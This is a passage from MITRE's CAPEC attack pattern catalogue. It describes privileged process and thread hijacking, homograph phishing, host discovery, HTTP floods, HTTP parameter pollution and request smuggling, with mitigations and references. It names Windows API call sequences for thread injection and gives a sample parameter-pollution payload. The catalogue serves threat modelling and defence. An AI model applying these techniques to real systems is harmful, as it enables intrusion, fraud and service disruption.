1027.003	Obfuscated Files or Information: Steganography
1027.004	Obfuscated Files or Information: Compile After Delivery
1218.001	Signed Binary Proxy Execution: Compiled HTML File
1221	Template Injection

References

[REF-493] Means, Ryan L.. "Alternate Data Streams: Out of the Shadows and into the Light". SANS Institute. <https://www.giac.org/paper/gcwn/230/alternate-data-streams-shadows-light/104234>.

Content History

Submissions
Submission Date	Submitter	Organization
2018-05-31 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2018-05-31 (Version 2.11)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Taxonomy_Mappings
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses

CAPEC-234: Hijacking a privileged process

Attack Pattern ID: 234

Abstraction: Standard

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	233	Privilege Escalation
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	100	Overflow Buffers
CanFollow	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	175	Code Inclusion
CanFollow	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	242	Code Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Find process with elevated priveleges: The adversary probes for processes running with elevated privileges.

Techniques
On Windows, use the process explorer's security tab to see if a process is running with administror privileges.
On Linux, use the ps command to view running processes and pipe the output to a search for a particular user, or the root user.

Experiment

Find vulnerability in running process: The adversary looks for a vulnerability in the running process that would allow for arbitrary code execution with the privilege of the running process.

Techniques
Look for improper input validation
Look for a buffer overflow which may be exploited if an adversary can inject unvalidated data.
Utilize system utilities that support process control that have been inadequately secured

Exploit

Execute arbitrary code: The adversary exploits the vulnerability that they have found and hijacks the running process.

Prerequisites

The targeted process or operating system must contain a bug that allows attackers to hijack the targeted process.

Resources Required

None: No specialized resources are required to execute this type of attack.

Related Weaknesses

CWE-ID	Weakness Name
732	Incorrect Permission Assignment for Critical Resource
648	Incorrect Use of Privileged APIs

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns, Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Description, Execution_Flow, Related_Attack_Patterns

CAPEC-30: Hijacking a Privileged Thread of Execution

Attack Pattern ID: 30

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	233	Privilege Escalation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Determine target thread: The adversary determines the underlying system thread that is subject to user-control

Experiment

Gain handle to thread: The adversary then gains a handle to a process thread.

Techniques
Use the "OpenThread" API call in Windows on a known thread.
Cause an exception in a java privileged block public function and catch it, or catch a normal signal. The thread is then hanging and the adversary can attempt to gain a handle to it.

Alter process memory: Once the adversary has a handle to the target thread, they will suspend the thread and alter the memory using native OS calls.
Techniques
On Windows, use "SuspendThread" followed by "VirtualAllocEx", "WriteProcessMemory", and "SetThreadContext".

Exploit

Resume thread execution: Once the process memory has been altered to execute malicious code, the thread is then resumed.
Techniques
On Windows, use "ResumeThread".

Prerequisites

The application in question employs a threaded model of execution with the threads operating at, or having the ability to switch to, a higher privilege level than normal users

In order to feasibly execute this class of attacks, the adversary must have the ability to hijack a privileged thread. This ability includes, but is not limited to, modifying environment variables that affect the process the thread belongs to, or calling native OS calls that can suspend and alter process memory. This does not preclude network-based attacks, but makes them conceptually more difficult to identify and execute.

Skills Required

[Level: High]

Hijacking a thread involves knowledge of how processes and threads function on the target platform, the design of the target application as well as the ability to identify the primitives to be used or manipulated to hijack the thread.

Resources Required

None: No specialized resources are required to execute this type of attack. The adversary needs to be able to latch onto a privileged thread.

The adversary does, however, need to be able to program, compile, and link to the victim binaries being executed so that it will turn control of a privileged thread over to the adversary's malicious code. This is the case even if the adversary conducts the attack remotely.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authorization	Gain Privileges
Confidentiality Integrity Availability	Execute Unauthorized Commands

Mitigations

Application Architects must be careful to design callback, signal, and similar asynchronous constructs such that they shed excess privilege prior to handing control to user-written (thus untrusted) code.

Application Architects must be careful to design privileged code blocks such that upon return (successful, failed, or unpredicted) that privilege is shed prior to leaving the block/scope.

Example Instances

Adversary targets an application written using Java's AWT, with the 1.2.2 era event model. In this circumstance, any AWTEvent originating in the underlying OS (such as a mouse click) would return a privileged thread (e.g., a system call). The adversary could choose to not return the AWT-generated thread upon consuming the event, but instead leveraging its privilege to conduct privileged operations.

Related Weaknesses

CWE-ID	Weakness Name
270	Privilege Context Switching Error

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1055.003	Process Injection: Thread Execution Hijacking

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances, Probing_Techniques, Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description Summary, Examples-Instances, Probing_Techniques
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Execution_Flow, Related_Attack_Patterns, Taxonomy_Mappings
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Description, Execution_Flow, Prerequisites

CAPEC-632: Homograph Attack via Homoglyphs

Attack Pattern ID: 632

Abstraction: Detailed

View customized information:

Description

Alternate Terms

Term: Homoglyph Attack

Likelihood Of Attack

Low

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	616	Establish Rogue Location
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	98	Phishing
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	89	Pharming
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	543	Counterfeit Websites

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Execution Flow

Explore

Determine target website: The adversary first determines which website to impersonate, generally one that is trusted and receives a consistent amount of traffic.
Techniques
Research popular or high traffic websites.

Experiment

Impersonate trusted domain: In order to impersonate the trusted domain, the adversary needs to register the URL containing the homoglpyh character(s).
Techniques
Register the Homograph domain.

Exploit

Deceive user into visiting domain: Finally, the adversary needs to deceive a user into visiting the Homograph domain.
Techniques
Execute a phishing attack and send a user an e-mail convincing the to click on a link leading the user to the malicious domain.

Prerequisites

An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets.

Skills Required

[Level: Low]

Adversaries must be able to register DNS hostnames/URL’s.

Consequences

Scope	Impact	Likelihood
Other	Other

Mitigations

Authenticate all servers and perform redundant checks when using DNS hostnames.

Utilize browsers that can warn users if URLs contain characters from different character sets.

Example Instances

An adversary sends an email, impersonating bankofamerica.com to a user stating that they have just received a new deposit and to click the given link to confirm the deposit.

However, the link the in email is bankofamerica.com, where the 'a' and 'e' characters are Cyrillic and not ASCII, instead of bankofamerica.com (all ASCII), which the user clicks after carefully reading the URL, making sure that typosquatting and soundsquatting attacks are not being leveraged against them.

The user is directed to the adversary's website, which appears as if it is the legitimate bankofamerica.com login page.

The user thinks they are logging into their account, but have actually just given their bankofamerica.com credentials to the adversary. The adversary can now use the user's legitimate bankofamerica.com credentials to log into the user's account and steal any money which may be in the account.

Homograph vulnerability allows an adversary to impersonate a trusted domain by leveraging homoglyphs and tricking a user into visiting the malicious website to steal user credentials.

Related Weaknesses

CWE-ID	Weakness Name
1007	Insufficient Visual Distinction of Homoglyphs Presented to User

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Phases
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Attack_Patterns
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses

CAPEC-292: Host Discovery

Attack Pattern ID: 292

Abstraction: Standard

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	169	Footprinting
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	285	ICMP Echo Request Ping
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	294	ICMP Address Mask Request
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	295	Timestamp Request
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	296	ICMP Information Request
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	297	TCP ACK Ping
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	298	UDP Ping
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	299	TCP SYN Ping
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	612	WiFi MAC Address Tracking
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	613	WiFi SSID Tracking
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	618	Cellular Broadcast Message Request
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	619	Signal Strength Tracking

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The adversary requires logical access to the target network in order to carry out host discovery.

Resources Required

The resources required will differ based upon the type of host discovery being performed. Usually a network scanning tool or scanning script is required due to the volume of requests that must be generated.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1018	Remote System Discovery

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 1: Footprinting, pp.44. 6th Edition. McGraw Hill. 2009.

[REF-34] Gordon "Fyodor" Lyon. "Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning". Section 3.6 Host Discover Techniques, pg.57. 3rd "Zero Day" Edition,. Insecure.com LLC, ISBN: 978-0-9799587-1-7. 2008.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated References
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Prerequisites, Description Summary, References, Related_Weaknesses, Resources_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings

CAPEC-469: HTTP DoS

Attack Pattern ID: 469

Abstraction: Standard

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	227	Sustained Client Engagement

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

HTTP protocol is usedWeb server used is vulnerable to denial of service via HTTP flooding

Resources Required

Ability to issues hundreds of HTTP requests

Mitigations

Configuration: Configure web server software to limit the waiting period on opened HTTP sessions

Design: Use load balancing mechanisms

Related Weaknesses

CWE-ID	Weakness Name
770	Allocation of Resources Without Limits or Throttling
772	Missing Release of Resource after Effective Lifetime

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1499.002	Endpoint Denial of Service: Service Exhaustion Flood

References

[REF-406] Robert Hansen. "Slowris HTTP DoS". 2009-06-17. <http://ha.ckers.org/blog/20090617/slowloris-http-dos/>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Mitigations
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-488: HTTP Flood

Attack Pattern ID: 488

Abstraction: Standard

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	125	Flooding

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

This type of an attack requires the ability to generate a large amount of HTTP traffic to send to a target server.

Mitigations

Design: Use a Web Application Firewall (WAF) to help filter out malicious traffic. This can be setup with rules to block IP addresses found in IP reputation databases, which contains lists of known bad IP addresses. Analysts should also monitor when the traffic flow becomes abnormally large, and be able to add on-the-fly rules to block malicious traffic. Special care should be taken to ensure low false positive rates in block rules and functionality should be implemented to allow a legitimate user to resume sending traffic if they have been blocked.

Hire a third party provider to implement a Web Application Firewall (WAF) for your application. Third party providers have dedicated resources and expertise that could allow them to update rules and prevent HTTP Floods very quickly.

Design: Use a load balancer such as nginx to prevent small scale HTTP Floods by dispersing traffic between a group of servers.

Implementation: Make a requesting machine solve some kind of challenge before allowing them to send an HTTP request. This could be a captcha or something similar that works to deter bots.

Related Weaknesses

CWE-ID	Weakness Name
770	Allocation of Resources Without Limits or Throttling

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1499.002	Endpoint Denial of Service:Service Exhaustion Flood

References

[REF-751] "HTTP Flood Attack". <https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/>. URL validated: 2023-01-20.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Mitigations, References

CAPEC-460: HTTP Parameter Pollution (HPP)

Attack Pattern ID: 460

Abstraction: Detailed

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	15	Command Delimiters
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	676	NoSQL Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Find User Input: The adversary finds anywhere in the web application that uses user-supplied input in a form or action. This can also be found by looking at parameters in the URL in the navigation bar of the browser

Experiment

Add Duplicate Parameter Values: Once the adversary has identified what user input is used as HTTP parameters, they will add duplicates to each parameter one by one to observe the results. If the response from the HTTP request shows the duplicate parameter value concatenated with the original parameter value in some way, or simply just the duplicate parameter value, then HPP is possible.

Techniques
In the URL, add a duplicate parameter by using the "&" delimiter. For example "par1=val1" becomes "par1=val1&par1=val2". Depending on the backend API, this could be treated as "par1=val1, val2", which could lead to par1 being set to val2, ignoring val1.
If the request is created based on user input directly on the page, the adversary will test by adding an encoded delimiter to the input. For example, the adverary might supply "1000%26action=withdraw" and the backend might interpret a POST request with the paramters "action=deposit&amount=1000&action=withdraw"

Exploit

Leverage HPP: Once the adversary has identified how the backend handles duplicate parameters, they will leverage this by polluting the paramters in a way that benefits them. In some cases, hardcoded parameters will be disregarded by the backend. In others, the adversary can bypass a WAF that might only check a parameter before it has been concatenated by the backend, resulting in malicious queries getting through.

Prerequisites

HTTP protocol is used with some GET/POST parameters passed

Resources Required

Any tool that enables intercepting and tampering with HTTP requests

Mitigations

Configuration: If using a Web Application Firewall (WAF), filters should be carefully configured to detect abnormal HTTP requests

Design: Perform URL encoding

Implementation: Use strict regular expressions in URL rewriting

Implementation: Beware of multiple occurrences of a parameter in a Query String

Related Weaknesses

CWE-ID	Weakness Name
88	Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')
147	Improper Neutralization of Input Terminators
235	Improper Handling of Extra Parameters

Taxonomy Mappings

Relevant to the OWASP taxonomy mapping

Entry Name
Web Parameter Tampering

References

[REF-397] Luca Carettoni and Stefano di Paola. "HTTP Parameter Pollution". OWASP EU09 Poland. The Open Web Application Security Project (OWASP). 2008. <https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf>.

[REF-606] "OWASP Web Security Testing Guide". Testing for HTTP Parameter Pollution. The Open Web Application Security Project (OWASP). <https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_HTTP_Parameter_Pollution.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Mitigations, References, Taxonomy_Mappings
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Execution_Flow

CAPEC-33: HTTP Request Smuggling

Attack Pattern ID: 33

Abstraction: Detailed

View customized information:

Description

See CanPrecede relationships for possible consequences.

Extended Description

A maliciously crafted HTTP request, which contains a second secretly embedded HTTP request is interpreted by an intermediary web proxy as single benign HTTP request, is forwarded to a back-end server, that interprets and parses the HTTP request as two authorized benign HTTP requests bypassing security controls.

This attack usually involves the misuse of the HTTP headers: Content-Length and Transfer-Encoding. These abuses are discussed in RFC 2616 #4.4.3 and section #4.2 and are related to ordering and precedence of these headers. [REF-38]

Additionally this attack can be performed through modification and/or fuzzing of parameters composing the request-line of HTTP messages.

This attack is usually the result of the usage of outdated or incompatible HTTP protocol versions in the HTTP agents.

This differs from CAPEC-273 HTTP Response Smuggling, which is usually an attempt to compromise a client agent (e.g., web browser) by sending malicious content in HTTP responses from back-end HTTP infrastructure. HTTP Request Smuggling is an attempt to compromise a back-end HTTP agent via HTTP Request messages.

HTTP Splitting (CAPEC-105 and CAPEC-34) is different from HTTP Smuggling due to the fact that during implementation of asynchronous requests, HTTP Splitting requires the embedding/injection of arbitrary HTML headers and content through user input into browser cookies or Ajax web/browser object parameters like XMLHttpRequest.

Alternate Terms

Term: HTTP Desync

Modification/manipulation of HTTP message headers, request-line and body parameters to disrupt and interfere in the interpretation and parsing of HTTP message lengths/boundaries for consecutive HTTP messages by HTTP agents in a HTTP chain or network path.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	220	Client-Server Protocol Manipulation
PeerOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	273	HTTP Response Smuggling
